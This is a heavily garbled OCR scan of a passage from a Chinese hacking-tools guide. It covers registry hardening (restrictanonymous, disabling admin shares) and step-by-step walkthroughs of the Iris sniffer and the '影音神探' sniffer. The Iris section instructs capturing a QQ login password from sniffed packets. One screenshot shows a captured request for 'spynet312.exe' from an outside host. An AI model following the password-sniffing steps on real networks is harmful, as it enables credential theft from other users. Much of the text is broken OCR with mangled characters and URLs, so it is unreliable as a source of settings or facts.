x#6 SS 查看 (V) 收藏 夫 (A) ”帮助 (H) 

| b “有 Diagnostics 名 称 类 型 

> -出 Els ab] (默认 ) REG_SZ 

“hh Errata Wauditbasedirec... REG DWORD 
REG_DWORD 


(数值 未 设置 ) 
0x00000000 (0) 
0x00000000 (0) 


msvi] 0 


) FileSystem auditbaseobje... 


ab| Authentication ... REG_MULTI Sz 
En Bounds REG_BINARY 00 30 00 00 00 20 00 00 
Pcrashonauditfail REG DWORD 0x00000000 (0) 


2 disabledomain... REG 妨 强 DWORD (32 位 | 值 


bb FleSystemUtilities 
p> - 电 FontAssoc 
> - hh GraphicsDrivers 
:DD GroupOrderList 
> -及 HAL 


此 
”二 
» .| Keyboard Layout 
， Keyboard Layouts 


hivelist 
IDConfigDB 


如 |everyoneinclud... 


forceguest 


|fullprivilegeau... 


P| LirtBlankPass... 


REQ | 总 认 名 称 00: 


REG | restrictanonymous 


RE || 数值 归 据 07 : 
i 加 十 六 进 抽 0 


9 十进制 向 ) 


P| LsaPid REQ 

NoLmHash REQ 
ab] Notification Pa... REG MULTI SZ scecll 

P| productType REG_DWORD 0x00000001 人) 

_DWORD 0x00000000 [0) 
0x00000001 (1) 
Ox00000001 (1) 


kerberos msvl1 0 schanne| wdigest 


,LsaExtensionConfig 


sie 


E restrictanonynmious E 
REG DWORD 
REG_DWORD 
REG_MULTI Sz 


Telrestrictanonynt™ 
咒 |SecureBoot 
ab| Security Packa... 


, MediaTypes 
Fa che 


将 restrictanonymous 键 值 改 为 1 


2) 修改 注册 表 ， 蔡 止 目 动 管理 共享 。 在 注册 表 编 辑 器 中 展开 HKEY LOCAL _ MACHINE' 
SYSTEM\CurrentControl SeAServicesS\LanmanServerParameters 分 支 , 找到 AutoShareServer 并 将 
其 值 改 为 0， 如 下 图 所 示 ， 同 时 找到 AutoShareWKs 将 其 值 改 为 0。 


Sy 


ST FF 二 


工具 全 攻略 


全 人 人 他 
文件 (H) ”编辑 (E) 章 春 (V) ”收藏 去 (A) 帮助 (H) | ee 
>… 昌 KsecDD ^ | | 名称 类 型 数据 
b>- KSecpkg ee 
》- 国 KtmRm ab] (BR) REG_SZ (数值 未 设置 ) 
-出 LIC Pe AdjustedNulls.. REG_DWORD 
a- | Lanmanserver Teautodisconnect REG DWORD 
i DD Aliases 


: > 几 AutotunedParameters 
:DD DefaultSecurity 
i | Linkage 


Penablesecurity.. 
Guid 


:… Dh ShareProviders 


训 Lmannounce 区 全 十 进 制 加 ) 
> Shares 


pi 2] NullSessionPip.. REG. 
“% ldap requiresecurity... 

> -BD Ikdio Prestrictnullsess.. REG DWORD 0x00000001 (1) 

> lltdsvec ab| serviceDl| REG EXPAND SZ %SystemRoot\system32\srmvsvc,d 
业 "hg 全 ServiceDllUnlo..，REG_DWORD 0x00000001 (1) 

)- 赐 

b -出 LSLFC 高 Size REG_DWORD 0x00000001 (了) 

b> -出 LSLSAS ab| srvcomment REG_SZ 

- 矶 LSLSAS2 

b -i LSILSCSI 

> luafv 

-上 MesSvc 


将 AutoShareServer 键 值 改 为 0 
3) 及 时 更 新 操作 系统 ， 其 重要 性 吏 不 必 多 说 了 。 


咒 探 工具 是 黑客 使 用 最 频 爱 的 工具。 


2.2.1 经 典 陨 探 器 [Is 

网 络 通信 分 析 工 具 Iris 可 以 帮助 系统 管理 员 轻 易 地 捕获 和 查看 进出 网 络 的 数据 包 ， 进 
行 分 析 和 解码 并 生成 多 种 形式 的 统计 图 表 ， 还 可 以 探测 本 机 端口 和 网 络 设备 的 使 用 情况 ， 
有 效 地 管理 网 络 通信 。 使 用 Iris 对 QQ 登录 密码 进行 嗅 探 的 具体 操作 步骤 如 下 。 


STEP01: 尼 动 Iris STEP02: 打开 Iris 主 窗口 


J XD EW WK ND NEED IRO Wh 
口 移 -加 和 | 区 司 回 目 | 多 过 是 世人 月 -四 -网 之 加 型 了 革 国 盈 - | 多 站 加 


+ X 厚 号 | 时 间 Qh:e:s:ms) | 采 源 mAC 地 址 | 目标 hc 地 址 | 帧 | 协议 | 采 源 下 地址 | 目 ; 


Atheros L2 Fast Ethernet 107100 Base-T Controller 


许 知 道 吗 . - . 


国 -一 - - 一 一 
| 族 可 以 设置 在 IRIS 孝 入 时 默认 加 载 和 应 用 的 过 浅 回 -要 完成 这 个 设置 ， 请 巷 到 工具 | 设置 | 捕获 菜单 法 项 . 》 总 
大 过 这 器 CU 4% 072000 IP: 192.168.0.15 MC: 00:12:8C:17:20:85 We) Attansic / 


选择 绑 定 网 卡 ， 然 后 单 击 “确定 ”按钮 。 单 击 工具 栏 上 的 “开始 捕获 ”按钮 >。 
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STEP03: 开始 捕捉 所 有 流 经 的 数据 帧 


人 IRIS wd4.07.1 
| 文件 处 ) 查看 四 _ 捕获 包 中 四 ) 过 滤器 这 ) 工具 代 ) 帮助 山 ) 
| 口 蕊 -上 回 :- 回国 | 的 让 籽 忆 全- 中 -SOO 


Iris 下 


| 封包 解码 器 | 序号 | 时 间 (hi:m:s:ms) | 来源 WAC 地 址 | 目标 IE 地 址 | 帧 
日 - 铺 Frane (1514 bytes) 10 15:58:53:984 00:15:58:8... 00:73:44:6... IP 
由 -四 BAC header (Ethernet II) 11 15:58:54:031 00:15:58:8... 00:73:44:6... IP 
四 -外 IPv4 heaaer 12 15:58:54:234 00:15:58:8... 00:73:44:6... IP 
口 - 国 TCP header (A...) 13 15:58:54:250 00:15:58:8... 00:73:44:6... IP 
@ Source port: 80 (TCP-> HTTP) 14 15:58:54:265 00:15:58:8... 00:73:44:6... IP 
@ Destination port: 16781 (TCF->16781) 15 15:58:54:296 00:15:58:8... 00:73:44:6... IP 
Sequence number: 2154555574 16 15:58:54:296 00:15:58:8... 00:73:44:6... IP 
2 5 (0 brtes) 18 15:58:54:296 00:15:58:8... 00:73:44:6... IP 
由 加 Rees: oao 19 15:58:54:312 00:73:44:6... 00:15:58:8... IP 
pe 20 15:58:54:312 00:73:44:6... 00:15:58:8... IP 

@ a Dx5C3E (Correct) i ee ee 

局 Urgent pointer: 0 二 了 el > -rs 

@ TCF Options: Hone 15:58:54:343 W013:38:05 00T3: WB. 

由 . 国 Hyper Tert Transfer Protocol (HTTF) | 15:58:54:390 OT MS 


. Mmicrosof-.. 123. a 9238 
. Microsof-.. B1. 164. 15. . 16757 
. microsof-... 60.191.25... 16773 
. Mmicrosof-... 61.155.14... 16683 
. Mmicrosof-... B61.153.48... 16682 
» Mt Boll = 

. Mmicrosof-... 218.75.159.4 16703 
IS Bibiede es es 

. microsof-... 218.75.159.4 16801 
. Bi1.153.48... microsof-... 8080 

. 60.191.25... microsof-... 80 -| 
.| 218.75.159.4 microsof-... 80 

.| microsof-... 218.75.159.4 16801 
.| microsof-... 218.75.159.4 16801 
.| 218.75. 159.4 microsof-... 


ee i 


112000 IP: 192.168.0.9 MAC: 00:15:58:BA:D4: 耻 [BB Realtek 10/100/1000 Ethernet >» 
查看 捕获 结果 。 单 击 主 窗口 中 的 “过 滤器 ”图 标 。 


1 ) 左 侧 的 “封包 解码 器 ” 窗 格 用 树 形 结构 显示 每 个 数据 包 的 详细 结构 (所 找 
《@@。 到 的 效 据 包 会 被 分 解 为 容易 理解 的 部 分 ) 以 及 数据 包 的 每 个 部 分 所 包含 的 数据 ， 
2 ) 右上 角 的 “数据 包 列 表 ” 窗 格 显示 所 有 流 经 的 数据 包 列 表 (新 产生 的 数 
是 不 据 包 自动 添加 到 列表 里 ) 在 选中 特定 的 数据 包 之 后 ,其 详细 信息 将 会 呈 树 形 显 
示 在 “封包 解码 器 ” 窗 格 中 。 每 一 行 数据 包 信息 所 包含 的 属性 有 数据 包 流 经 时 
间 、 来 源 MAC 地 址 和 目标 MAC 地 址 、 帧 形式 、 所 用 传输 协议 、 来 源 IP 地 址 
和 目标 IP 地址 、 所 用 端口 、 确 认 标 志 及 大 小 等 。 
3 ) 右 下 角 的 “编辑 数据 包 ” 窗 格 分 左右 两 部 分 ， 左 边 显示 数据 包 十 六 进 制 
信息 ， 石 边 则 显示 对 应 ASCII 码 值 ， 可 以 在 这 里 编辑 、 修 改 数 据 包 并 发 送 (会 
自动 添加 到 数据 包 列表 中 小 


STEP04: 编辑 过 滤器 设置 


在 没有 开局 Filter 功能 之 前 ， 可 能 抓获 的 是 所 有 进 
出 网 卡 的 流量 。 为 了 方便 查找 目标 ， 需 要 进行 简单 
的 过 滤 ， 包 括 硬件 、 层 、 关 键 字 、 端 口 、MAC 地 
址 、IP 地 址 等 的 过 滤 。 


名 包括 
注意 : 已 过 滤 的 端口 将 会 应 用 于 封包 来 源 端口 或 目标 端口 


取消 | 应 有 | 帮助 | 


Im 


全 人 人 他 
STEP05: 运行 QQ 客户 端 软件 


#3 IRIS vd.07.1 
| 文件 外 查看 外， 捕获 已) 解码 0) 过 尖 器 并 工具 仓 ) 帮助 加 
| 口感 : 园 -||m 策 | 碟 胃 | 国 图 | 的 让 而 记 | 傅 - 略 - 全 | 后 | 妃 四 和 且 让 全国 | 加 .| 信阳 回 


解码 l 
主机 活动 | 序号 | 日期/ 时间 名: 了 :Yhim: s:ms) | 客户 端 | 服务 器 | 客户 端 端 口 | 服务 器 端口 | 客户 端 WAC | 进入 宇 节 | 六 
日 -加 microsof-c0c50d. kingnet (192.168.0.9) 2.. 6:24:2010/16:10:42:531 mess: 61 MrT60 8080 00:15:5... 841 
本 Icr-> NTITP (80) | 2.. 6:24:2010/16:10:42:734 mic... Bl.... 17807 8080 00:15:5... 
局 ICP->Generic (8080) 加 2 6:24:2010716:10:42:765 mie... B1.... 17816 8080 00:15:5... 
fa TCP->1103 (1103) (D2.. 6:24:2010716:10:42:531 mie... Bl.... 17778 8080 00:15:5.,， 
io TCIT-29002 (9002) (D2.. 6:24:2010/16:10:42:734 mic... 61.... 17808 8080 00:15:5... 
ia TCP- >Generic (8000) (2.. 6:24:2010/16:10:42:765 mie... B61.... 17818 8080 00:15:5... 
i YC? >10118 (10116) D2. 6:24:2010/18:10:42:765 mic... B61.... 17812 8080 00:15:5... 
i I GoM) D2. 6:24:2010/16:10:42:531 nie... B81.... 17775 8080 00:15:5... 
I bi (D2.. 6:24:2010/16:10:42:546 nie... B61.... 17787 8080 00:15:5... 
0 本 3.. 6:24:2010716:10:42:718 mic... Bl.... 17806 8080 00:15:5... 
nn ny 3.. 6:24:2010/16:10:42:546 mic... B61.... 17789 8080 00:15:5... 
mo) TCP->11245 (11245) (D3. . 6:24:2010/16:10:42:718 mic... Bl.... 17805 8080 00:15:5... 0 
ja TCP-y9097 (9097) (D3.. 6:24:2010716:10:42:765 mie... Bl.... 17811 8080 00:15:5... 
TCP-311005 (11005) 全 3. . 6:24:2010716:10:42:546 Mie we UE 8080 LE 
i ICP-28382 (8382) 全 2. .6:24:2010716:10:42:546 Mle sy IT 8080 (Es 
fa TCP->8116 (8116) | 站 | 
ICP->9043 (9043) = 
TCP->24472 (24472) 国 | 
ICF->12205 (12205) 人 国有 0 国人 = 
“ETCP-29527 (9527) GET /spynet312. exe HTTP/1.!1 
WH] TCP->10767 (10767) Accept: */* 
Ww TCP->9001 (9001) Cache-Control: no-cache 
il TCP->11787 (11787) Cormection: Keep-Alive 
: ICP->8768 (8768) Host; 23, duote, org;8080 
.am TCE->13050 (13050) | Prasma: nn-narhe 
Mm Trp->inn3as finnas1 2 


您 知道 吗 ... 
利用 地 址 湾 您 可 以 更 加 简便 地 创建 过 小 器 。 


| 无 过 涯 器 。 |CPV: 3% 2000 |IP: 192.168.0.9 MAC: 00:15:58:8A:D4:F8 | Realtek 10/100/1000 Ethernet ,/ 


这 里 要 捕获 其 登录 密码 ， 所 以 运行 QQ 程序 进行 登录 。QQ 登录 成 功 后 单 击 Iris 工具 栏 上 的 停止 抓 包 按 
钮 转 ， 停 止 对 数据 的 捕获 。 密 码 就 藏 在 捕获 的 数据 包 中 ， 只 需 单 击 左 侧 的 “解码 ”按钮 ， 即 可 对 捕获 的 
数据 包 进 行 分 析 查 找 。 


在 左 侧 的 “主机 活动 ” 窗 格 中 ， 选 择 按照 服务 类 型 显示 的 树 形 结构 的 主机 
传输 信息 。 
@ 在 选中 茶 个 服务 之 后 , 客户 机 和 服务 器 之 间 的 会 话 信息 就 会 显示 在 右上 
角 的 “会 话 列表 视图 ” 窗 格 中 ，。 
@ 在 选中 茶 个 会 话 记 录 之 后 ， 就 可 以 在 石 下 角 的 “会 话 数据 视图 ” 窗 格 里 
显示 解码 后 的 信息 。 
在 “会 话 列表 视图 ” 窗 格 中 ， 每 个 会 话 的 属性 有 服务 器 、 客 尸 端 、 服 务 器 


端口 、 答 户 端 端口 、 竹 户 端 物理 地 址 ， 还 有 服务 器 到 客户 端的 数据 量 、 客 尸 端 
到 服务 器 的 数据 量 以 及 总 的 数据 量 。 右 下 角 的 “会 话 数据 视图 ” 窗 格 显示 解码 
后 的 会 话 信 息 。 


< 第 2 章 


扫 质 与 咱 探 工具 
STEP06: 打开 主 界面 STEP07: 查看 主机 排名 


(3 IRIS vd.07.1 
文件 E) 查看 Q) 捕获 () 解码 四 过 泥 器 (I) 工具 (f) 和 
DD 区 -加 -| 人 纺 | 导 王国 国 名讳 | 


Iris 


“主机 活动 


SD nicrosof-cO0cS50d. kinene 
{2 ICP-> HTP (80) 
{2 TCF->Generic (8080) 
Fn TCP->1103 (1103) 
ma TCF->9002 (9002) 
TCF->GCeneric (8000) 
站 TCF->10116 (10116) 
TCF->12418 (12418) 
nm TCF->10879 (10879) 


192. 168.0.9 8784147 字 节 来 自 17597502 49. 92% 


单 击 工具 栏 上 的 “显示 主机 排名 统计 ”按钮 地 。 以 图 表 形 式 查 看 与 本 机 相连 的 数据 量 最 大 的 10 台 
主机 。 
尽管 Iris 咒 探 右 功 能 强大 ， 但 它 也 有 一 个 任命 的 界 点 : 黑客 必须 侵入 一 台 主 机 才 可 以 
使 用 该 咒 探 工具 。 因 为 只 有 在 网 段 内 部 才 可 以 有 广播 数据 ， 而 网 络 之 间 是 不 会 有 广播 数据 
的 ， 所 以 Iris 咒 探 如 的 局 限 性 就 在 于 只 能 使 用 在 目标 网 段 上 。 


2.2.2 使 用 “影音 神探 ” 噢 探 在 线 视 频 地 址 


使 用 影 刻 嗅 探 大 师 “ 影 首 神探 ”可 轻松 找到 电影 的 下 载 地 址 。 它 使 用 WinPcap23 开发 
包 ， 咒 探 流 过 网 卡 的 数据 并 进行 智能 分 析 ， 可 监视 20 余 种 网 络 文件 ; 可 目 行 定义 ， 可 通过 
上 定义 类 型 扩充 咒 探 功能 ; 双击 找到 的 文件 即 可 目 动 局 动 事先 设置 好 的 下 载 工 具 进 行 下 载 ; 
可 奏 看 远程 IP 连接 ， 获 知 卫 协议 ， 下 载 准 确 快 捷 ， 弹 出 广告 屏蔽 模块 可 让 用 户 上 网 不 再 


受 弹 出 广告 之 累 。 
设置 和 使 用 影音 神探 的 具体 操作 步骤 如 下 。 
STEP01: ”启动 影音 神探 STEP02: 安装 WinPcap 


爷 WinPcap 4d.1 betap Setup 


Wh Pea WinPcap 4.1 beta5 Installer 
Welcome to the WinPcap 4.1 beta5 Installation Wizard 
四 注意 ?请 先 安装 winpcap 后 再 启动 程序 。 nN P 


按 "OK" 上 后 开 娟 安 尝 WWinPcap 


i Cancel 


弹出 “Error” 提示 框 ， 提 示 “ 请 安装 WinPcap 后 再 “一直 单 击 “Next” 按钮 ， 将 开始 安装 WinPcap， 最 
启动 程序 ”信息 ， 单 击 “OK” 按钮 。 后 单 击 “Finish” 按 钮 ， 完 成 WinPcap 安 装 。 


4 


j 


工具 全 攻略 


全 人 人 他 
STEP03: 查看 提示 信息 


提示 “程序 将 会 测试 所 有 了 网络 适 配器 ”信息 ， 单 击 
“OK” 按 钮 。 


STEP04: 打开 “设置 ”对 话 框 STEP05: 查看 提示 信息 


Information 


网 络 适配器 

网 络 适 有 名 称 | 接口 | 状 
OAdapter for generic dialup and..，'DeviceiNPF_Ge..， 正在 测试 
口 Reaktek 10:H 00M O00 Ethernet ... ‘DeviceiPF _{C... 


l 试 网 站 :baidu.com 


测试 网 络 配置 是 否 可 用 。 如 果 本 机 的 网 络 适配器 符合 测试 要 求 ， 即 可 看 到 该 
提示 信息 ， 单 击 “OK” 按 钮 。 
STEP06: 返回 “设置 ”对 话 框 STEP07: 返回 “影音 神探 ” 主 窗 口 


网 络 嗅 探 回 ( 影 音 神探 )V5.5 
穆 探 CO 列表 (L) 设置 (0) 必 肌 四 


次 件 类 型 
| 网 络 适 配 名 称 [接口 [状态 ”| | 
口 dapter for yeneric dialup and..， ‘DeviceNPF_Ge... 不 可 用 
Reatek 10M O00 000 Ethernet ... ‘DevyiceWPF_{cC... 可 用 


60 分 钟 免费 网 络 电话 + 600 条 免费 短信 发 送 
2 册 条 要 不 要 由 你 自己 决定 ! 合 和 
_ 地 址 [所 有 类 型 文件 ] EA 


测试 网 站 : baidu.com ”| 测 汪 所 有 网 络 适 配器 


停止 嗅 探 。” ”当前 工作 模式 [ 获 职 URL] 网 络 咱 探 器 (影音 神探 ) 官 方 网 站 www-.wlxdtq.com 


可 看 到 可 用 的 网 络 单 击 “确定 ”按钮 ， 选择 “ 嗅 探 ”> “开始 嗅 探 ”菜单 项 或 单 击 工具 栏 
适配器 已 经 被 选中 。 即 可 完成 对 网 络 适 配器 ”的 “开始 嗅 探 ” 按 钮 氏 。 
的 设置 。 
STEP08: 开始 进行 噢 探 


网 络 嗅 探 器 (影音 神探)V5.5 EX 
啤 探 () 列表 (LD) 设置 (0) 帮助 (H) 
我 和 针 汪 他 全 60 分 钟 免费 网 络 电话 + 600 条 免费 短信 发 送 中 公关 
a AN q 之 La AN — 
fj 尖 六 深 | 停 止 噢 探 | 设置 ， 景 小 化 | 退出 要 不 要 由 你 自己 决定 ! 移 3 上 进入 打 电 话 | 01 旦 . 看 串 探 到 的 信 NO 

| 文件 类 型 | 数据 包 方向 | 地 ” 址 [所 有 类 型 文件 ] | 备注 a 
文本 文件 本 机 一 一 网 络 http.jnwww .wwtxtqcomjsdmaxs htm 
文本 文件 本 机 一 一 网 络 http: /fengine.100tenim cnisienginejsp?dvid=im100fen2228riG=2228wid=19141&8w=08h=08styp = 
文本 文件 本 机 一 一 网 络 http:jizs3.cnzz.cormjistat htm?id=10740958r=3lg=zh-cnantine=0.999333003962012774455778rep. 
图 片 立 件 本 机 一 一 同 络 http:jnwvww.wtxtqcoryadmaxs gif [1 ~ 9 、 

本 机 一 一 网 络 http:iist Video beidu,comWvideoyindexstaticfL_ingyarrow gf 02 TE 广 全 类 型 旋 | 表 中 右 击 sa 下 载 的 广 件 9 从 
图 片 文件 本 机 一 一 网 络 http: msclick baicu.comih git ?pid=104&Y=video-index&r=12774496574218&xp=_tab-4_Sobjuri=non... 
文本 文件 本 机 一 一 网 络 http'Jmideo sina com cnvfb/34620116-1579974291 himl 
图 片 文件 网 络 一 一 本 机 http:iip4.v iask.com/S1/774/34620116_1 pg ~ [9 )9 
图 片 文件 术 机 -一 网 络 。。 http baidu.comiltlu=716368479,1891574028&fm=08gp=0jpg 由 捷 菜单 中 选择 复 制 | 地 址 命令 即 口 | 复 制 | 选 中 
图 片 文件 术 机 一 一 网 络 。。 http baidu.comtu=3581584026.2679458568&fm=48gp=0 jpg E 
文本 立 件 网 络 一 一 本 机 http: /fsearch video sina com cnfsearch php 
图 片 文件 本 机 一 一 网 络 http: /M2 baidu com/tiu=1141725060,4039153844&fm=0&op=0 jpg ~ 
文本 立 件 网 络 一 一 本 机 http:iisearch video .sina.com.cnisearch php?k=%E5%B8%8C5%5E5%B03694%E9%A1%BF%E93%58.. 广 和 的 下 载 地 址 
文本 文件 网 络 一 一 本 机 http: isearch .video .sina.com.cnjsearch.php?k=%E69%B6%895%E9%BB36848type=all O 〇 
图 片 文 件 本 机 一 一 网 络 http: #3.haidu.comitiu=1659040260,2176562359&fm=68gp=0 jpg 
图 片 文件 本 机 一 一 网 络 http' M2 bsidu comitiu=2775977659,14606907423fmz53cpz0jpg 
图 片 文件 本 机 一 一 网 络 http:/t2bsidu.comtiu=1457200017,38404814632fm=7&0p=0 jpg 
图 片 文件 本 机 一 一 网 络 http:J3 baidu cotu=1515048808,4209480272&fm=68gp=0jpg i 
图 片 文件 本 机 一 一 网 络 http: /M2 baidu .com/tiu=3770743946,2416159092& fm=6&gp=0 jpg ~ [0 入 [0 本 >) 二 wa 
图 片 立 件 本 机 一 一 网 络 htp: baidu conftiu=3138067842.3080033138fm=78gp=Djpg 03 先 择 史 表 > 用 [xy 际 快车 下 载 | 单 op Ee oO 
图 片 文件 本 机 一 一 网 络 http:Jh baidu comlt lu=2718890101,4105112946&fm=6&op=0 jpg 
图 片 交 件 本 机 一 一 网 络 http:jt baidu cormtu=2467610071,26111346608fm6Sgp-0jps 
图 片 文件 本 机 一 一 网 络 http:jt baidu .comitiu=4019086439,41763741768fm=G86p=0 jpg 
文本 文件 网 络 一 一 本 机 htp: lvideo ,sina.com.cnpinewsicfY2010-05-261191551015699 html?rec=4 
文本 文件 网 络 一 一 本 机 http: /fviden sina com cnhfnewsiCrvP2010-05-241032651013859 html?rec=4 

网 络 一 一 本 机 http: /fvideo sina.com.cniplaylist/69050-1219126120-1 html?rec=4 
图 片 文件 网 络 一 一 本 机 Ypi/wpic3.sinaimg com cn/0dbai69050.if = 
状态 : 开始 嗅 探 当前 工作 模式 获取 URU] 网 阁 嗅 探 器 (影音 神探 ) 官 方 网 站 www.wbdq.com 


2 
扫描 与 噢 探 工 具 
STEP09: 新建 任 务 STEP10: 用 网 际 快车 下 载 


| 国标 快 车 FlashGet mm™ py 
> Ed | Me 


地 址 : |.tp: ip2. viask. comfTT5/515/1153485_1. jp 由 选择 BT 种 子 


1153485_1.ipg 


保存 至 : 377K ”2010.6.25 15:310[ Ci\Downloads W 
文件 名 
保存 为 默认 陡 ， vi es 
设置 保存 路 径 与 文件 名 ， ”图 单 击 “ 确 定 ” 开始 进行 下 载 ， 待 下 载 完成 后 可 在 “文件 名 ”后 面 
并 将 刚 复 制 的 地 址 粘贴 到 “地 按钮 。 看 到 有 个 “WV”。 
址 ” 栏 中 。 


如 果 要 选择 “影音 传送 带 下 载 ”选项 或 者 “网 际 快车 ”选项 ， 则 先 要 安装 
旺 示 “影音 传送 带 ”或 “网 际 快车 ”软件 ， 才 能 使 用 软件 中 对 应 的 操作 方法 . 


STEP11: 返回 “影音 神探 ” 主 窗 口 STEP12: “自动 开启 噢 探 ” 等 设置 
同 络 响 探 加 (影音 神 捧 )v5.5 Ee" 


隐 探 () 列表 (DD 设置 (Q) 玫 助 (H) 
i 网 络 适配器 | 文件 类 型 
“60 分 钟 免费 网 络 
于 出 


办 | 外 
ee ee | 后 受 不 要 由 你 目 问 自动 开启 嗅 探 


交 件 类 型 | 数据 包 方 上 | [所 有 类型 辫 件 


公主 列举 未 定 必 次 件 类 型 
同 允许 列举 重复 的 URL 


网 际 快 车 主 程 房 位置 ”人 @ 网 际 快车 [ .| 


停止 嗅 探 当前 工作 醒 式 B 网 络 咱 探 器 ( 影 音 神 探 ) 官 方 网 站 www wwlxtq.com 


单 击 “ 设 置 ”> “综合 设置 ”菜单 命令 。 根据 需要 在 “常规 设置 ”选项 卡 中 勾 选 相应 复 选 框 。 
STEP13: 切换 至 “文件 类 型 ”选项 卡 STEP14: 给 噢 探 的 数据 包 添 加 备注 信息 


HE 5 


条 


网 络 适配器 


回 回音 频 立 件 
国 图 片区 件 
回 广 本 文件 
国 自 定 必 类 型 


景 小 化 退 出 


田 - 由 - 田 - 田 - 团 


停止 谢 榨 ”当前 工作 模式 区 职 URL】 ”网 络 响 探 器 (影音 神探 ] 窜 方 网 站 wwww wvixtq.com 


设置 要 下 载 文件 的 类 型 ， 这 里 义 选 所 有 的 复 选 框 。 单 击 “列表 ”>“ 增 加 备注 ”菜单 项 。 


51 计时 计 计时 


ST IF 一 一 


全 人 人 他 
STEP15: 编辑 备注 


工具 全 攻略 


输入 备注 的 名 称 。 单 击 “OK” 按 钮 。 


STEP17: 分 类 显示 噢 探 出 的 数据 包 


网 络 唤 探 串 ( 雯 音 神探 )V5.5 
听 蚀 (@) 列表 QL) 设置 (0) 必 助 (H) 


们 站 长 统计 

Ls 车 
最 小 化 | 退出 

| 地 址 [图 片 文件 ] 
httpiiic.chinaih.comicode_img/920x90 gif 
http-/isimg0 sinajs .cnNideo/imagesicommonico_transparent .gif 
pttpe 0 sinaimg cnjdy/2010im523j2010523164344jpg 
httpe/0 sinaimg cnidy/2010/0526/2010526192224 jpg 
httpcM2 digua123.comimey4_4662139.gif 
httpe/icirimcomim baidu.com/js/mg/close .gif 
htprNsimg0 sinais .cnlvideo/imagesicommonAoginlayer .gif 
httpMsjs0.sinalscnvideojimagesicommorjinputine gif 
http-Msjs0.sinajs .cn/videolimages/common/oginiayer2 .gif 
httpctisjs0.sinajs .cnMvideoiimages/commonidowwntip gif 
httpr/weacon.sina .com cn/a gf?Y=2&CFSZ1400x900ldp-16lac:Mozilalan MSIEIcpux55IpfWin32jv1.3lct-langzh-cnkz-… 
httpr/sina.wrating .com/a gif ?a=1296e02b721&t=&i=4f7a24003.1296e02b721 0 .0d4954cd1e29d48b=hittp%3A/Nideo sin - 
httpiNvideo sinacom cn/yinjian/2010y/02m/26sfloat1 titneww gif 
http'M3 ,sinaimg cntblogiframerd/200711 022AJ2261P478T9D78F190DT20100625100251 jpg 
httpi/h3 ,sinaimg cn/y blog/images/front/loatl bg .oif 
httpeh3 sinaimg cnivblog/images/trontitlioat1 _btn_icon oif 
httpeih3 .sinalmg cn/v biog/images/trontioat1 _btn_icon gif 
httpcW3 .sinaimg .cnivblog/imagesifrontiloat _bct .gif 
http./hmage2.sina.com.cnivblogimages/irontifioat1 _btn_close .gif 
httpiimage2 sina com_cnjvbloghmagesifrontflcat1_btn_sgif 
http- M2 .simnaimgcnvblogfnages/fronthloat1_btn_icon gif 
httprkz zaqgame comk zimiimages bg jpy 
htpeimkz zqgame .comkzlmimagesktdjpg 
httpckz zayame .CompassportbgiLoading JPG 
httpjikz zayame .ComkzlmimagesicolD1 jpg 
httpciikz zadgame Com 水 zlmjimagesifooterlogo gif 
httprp1.Y jask.corSPM4175208_1jpg 


开始 嗅 探 ” ”当前 工作 模式 [获取 URL] 网 络 嗅 探 器 (影音 神探 ) 官 方 网 站 www wbitq .com 


STEP18: 返回 “好 音 辫 神探 ” 主 窗口 


| 网 络 响 控 器 影音 神探 V5.5 PFC 
Em EE EL wT 
@l®|s 贫 | 名 60 分 钟 免费 网 络 电 话 + 600 条 免费 短信 发 送 
开始 噢 探 | 停止 贤 控 | 设置 最 小 化 | 退出 ~ 要 不 要 由 你 自己 决定 ! 全 3 上 进入 打 电 话 [ 
文件 区 型 | 小 据 包 方向 | 地 址 [所 有 芝 型 文件 ] | 备注 | 
状态 停止 蜡 探 ” ”当前 工作 模式 [获取 URL] 网 近 器 (影音 神 肿 言 方 网 站 www wbdd.com 


选择 “列表 ”> “保存 列表 ”菜单 命令 。 


STEP16: 返回 “影音 神探 ” 主 窗口 


| 网 络 噢 兵器 (影音 神 琛 )V55 EX 


了 览 探 (DO 列表 人 “设置 (0) 儿 助 (0 


© @ 贫 | 恒 检测 到 您 的 系统 在 使 用 老 版 本 WINRAR! | fe 新 浪 下 载 中 心 
EF 2 2 

开始 嘎 探 | 停止 噢 探 | 设置 | 最 小 化 | 退出 4 立即 免费 下 载 新 版 压缩 软件 编辑 推荐 

| 文件 类 型 | 数据 包 方向 | 地 址 [所 有 类 型 文件 ] | 人 

图 片 文件 本 机 一 一 网 络 http: /tsimg0 sinajs .cnivideoimagesicommoniclose gif 

文本 文件 本 机 一 一 网 络 http: .you.video.sina .com.cniappicount/getFiashCount php?vid=hotvid_hot_len_0-34451739xhot... 

图 片 文件 本 机 一 一 网 络 Ny gif Tpid=1 048S=28Ushitp. /iy ku6.comishowjHa-RXPPa9GPiP5G|html&aword=%6c2%5809%6c1%d5.. 

文本 文件 本 机 一 一 网 络 http:ifzs3.cnzz .comistat htm?id=10740958&r=8lg=zh-cn&ntime=0.99933300%2012774455778rep... 

文本 文件 本 机 一 一 网 络 http:/kz zqygame .comikzimindex htmi?ad=i9sr5xnr_4d%2C54%2C6b%2C78%62C4e%2C44%2C45.. 

文本 文件 本 机 一 一 网 络 http: /kz zqgame comiareg/checkcode/Code aspx?0.7897698271275049 

图 片 文件 本 机 一 一 网 络 dot A {Nideo sina. com cnyVbi34620116-1579974291 html&word=%c1%1..…. 

3 http:# cnzz com/stat /website php?yweb =1074095 

文本 文件 网 络 一 一 本 机 http: FE .Comistat htm?id=1074099 

文本 文件 本 机 一 一 网 络 http:/izs3.cnzz .comistet htm?id=107409d8r=8lg=zh-cngntime=0.74983100%2012774509818rep... 

文本 文件 网 络 一 一 本 机 http:/Ad zqgame coractivitieshtdm6hnde chimi?adtd142_4d%62C54362C6b%2 

文本 文件 本 机 一 一 网 络 http:/hd zqgame com/activitiestcdim6indek htmi?ad=td142_4d%2C54%2C6b%2C78%2C4e%2C44... 有 

文本 文件 网 络 一 一 本 机 http:/hd zqgame .cornainjistpage aspx 本 

文本 文件 网 络 一 一 本 机 http: /Ad zqgame cormxszmjindex html 

文本 文件 网 络 一 一 本 机 http: /fd zqgame Cormyyxzlinfor html 

文本 文件 网 络 一 一 本 机 http:/Ad zqgame Comidownloadixzzq ht 

图 片 文件 本 机 一 一 网 络 http: /hd zqgame .com/activitiestcimB made sibg jpy 

图 片 文件 本 机 一 一 网 络 http: /Ad zqgamme Coractivitiesktdim6hnageshdjpg 

图 片 文件 本 机 一 一 网 络 http:/Ad zqgame .comipassportbglLoadingd .JPG 

图 片 文件 本 机 一 一 网 络 http:jtd zagame .comactivitiestdimB made sifooterlogo gif 

